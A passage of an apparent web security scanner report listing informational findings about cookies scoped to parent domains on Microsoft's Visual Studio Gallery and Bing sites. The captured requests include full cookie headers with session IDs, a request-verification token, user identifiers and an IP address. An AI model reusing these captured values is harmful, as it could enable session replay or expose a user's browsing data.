Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891

Response

10.171. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; msdn=L=1033; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==

Response

10.172. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
Content-Length: 0
Origin: http://visualstudiogallery.msdn.microsoft.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; msdn=L=1033; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==

Response

HTTP/1.1 200 OK
Cache-Control: public, no-store, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 23 Jul 2011 02:01:13 GMT
Last-Modified: Sat, 23 Jul 2011 02:01:13 GMT
Vary: *
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:13 GMT; path=/
Server: GALS01
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:01:12 GMT
Content-Length: 2

{}

10.173. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/globalresources/scripts/ms2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalresources/scripts/ms2.js HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==; msdn=L=1033

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=15552000
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 19:39:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:21 GMT; path=/
Server: GALS01
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:01:20 GMT
Content-Length: 12210

var fl = 0,
sessionId = "",
sessionDuration = 1800000,
sessionCookieName = "MC0",
cookieDisabled = 0,
metaTags = "",
customTags = "",
pvInfo = [],
clickInfo = "",
q
...[SNIP]...

10.174. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:03:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula?licenseType=None HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.NumberOfVisits=2&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:03:22&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=111&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; msdn=L=1033

Response

10.175. http://visualstudiogallery.msdn.microsoft.com/site/favorites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/favorites

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:09:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/favorites HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula?licenseType=None
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; ADS=SN=175A21EF; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779700021Gx0002g1Gx00&GO=12

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a%2f%2fvisualstudiogallery.msdn.microsoft.com%2fsite%2ffavorites%3fstoAI%3d10&wp=MBI_FED_SSL&wlcxt=microsoft%24microsoft%24microsoft
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:09:07 GMT; path=/
Server: GALS01
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:09:07 GMT
Content-Length: 373

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=visualstudiogallery.msdn.microsoft.com&wreply=https%3a
...[SNIP]...

10.176. http://visualstudiogallery.msdn.microsoft.com/site/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:03:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/search?f%5B0%5D.Type=User&f%5B0%5D.Value=Mike%20Barnett HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; __RequestVerificationToken_Lw__=pjHQY8BdGI546GlXaRKN3E32bQyPjbHeACZ5mzigbLl9Q/Wgo6Sb4UGfNT47nDIqgqTJtPiw/S9u9F6ytYv8WnsfOJ3cf4Y0ceqNv6pDAd3bot9EW3xE9NPNKAshDbzMwut2oQ==; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.NumberOfVisits=1&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=110&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b; msdn=L=1033

Response

10.177. http://www.bing.com/fd/ls/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/l

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:27 GMT; domain=.bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/l?IG=8b890481b4a848de957262672a125e92&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:6,%22FC%22:26,%22BC%22:26,%22BS%22:35,%22H%22:67,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:162,%22KP%22:32,%22CT%22:175,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=msndn&form=MSSRPD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=89F12CC9D638450E92DC23D5775C5EE7; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; usrID=675118e5-4035-33c8-e140-8075ff0d34cb; _FP=; _SS=SID=B8C6EB515AE04F898383683B7D3C2EF8; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c8b890481b4a848de957262672a125e92; SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 23 Jul 2011 02:08:27 GMT
Connection: close
Set-Cookie: SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:27 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

10.178. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=B8C6EB515AE04F898383683B7D3C2EF8; domain=.bing.com; path=/
MUID=E361C23374E642C998D8ABA7166A75EC; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c8b890481b4a848de957262672a125e92; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=msndn&form=MSSRPD HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
